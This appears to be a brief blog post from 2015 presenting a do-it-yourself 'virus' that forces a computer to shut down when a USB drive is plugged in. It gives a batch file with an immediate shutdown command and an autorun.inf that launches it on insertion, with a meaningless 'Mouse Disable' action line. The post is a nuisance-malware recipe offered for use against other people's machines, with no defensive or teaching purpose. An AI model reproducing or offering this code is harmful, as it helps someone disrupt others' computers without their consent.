Thursday, 10 September 2015

Create virus that turnoffcomputer when pendriveis inserted

image



Step 1:>>copy this code into notepad:
@echo off
shutdown -s -t 00

Save as turnoff.bat
Step 2:
Now open the notepad and copy this
code:
[autorun]

Open=turnoff.bat
Action=Mouse Disable
Save it as “autorun.inf”
Previous Post
Next Post
Related Posts